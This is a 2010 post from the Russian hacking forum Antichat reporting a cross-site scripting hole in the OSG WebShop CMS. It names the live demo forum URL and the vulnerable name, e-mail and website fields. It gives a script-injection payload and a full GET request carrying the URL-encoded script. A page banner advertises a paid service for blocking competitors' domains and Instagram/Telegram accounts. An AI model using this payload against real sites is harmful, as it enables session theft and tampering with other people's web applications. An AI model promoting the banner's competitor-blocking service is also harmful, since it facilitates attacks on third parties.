Обзор уязвимостей в платных CMS

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Обзор уязвимостей в платных CMS

Опции темы

Поиск в этой теме

Опции просмотра

#20

06.12.2010, 02:19

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

С нами: 8456812

Репутация: 55

OSG WebShop

офф сайт: http://www.osg.ru/

Xss

Код:

http://www.demo.osg.ru/forum.html

Вбиваем ">alert('ded-m0r0z')

Уязвимые поля:

Код:

Ваше имя
Ваш e-mail
Ваш адрес в Internet

ну и гет запрос будет примерно таким:

Код:

http://www.demo.osg.ru/forum.html?idc=0&stype=0&pgn=1&idbook=97&idmain=0&idmess=0&rnd=14613&pgn=1&s_cf=28%2E50&s_ch=6A675D26682717306851D40C1878BD14&gbmess=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r0z%27%29%3C%2Fscript%3E&idbook=97&gbwww=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор уязвимостей WordPress ]	ettee	Веб-уязвимости	383	23.11.2019 05:00
[ Обзор уязвимостей miniBB ]	-=lebed=-	Уязвимости CMS / форумов	3	12.01.2008 20:57
Статья обзор уязвимостей бесплатных почтовых сервисов	markel	Уязвимости Mail-сервис	3	12.09.2005 10:07
Обзор рынка взломщиков электронной почты, март2004	Игорь Белкин	Уязвимости Mail-сервис	5	25.03.2004 12:32

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules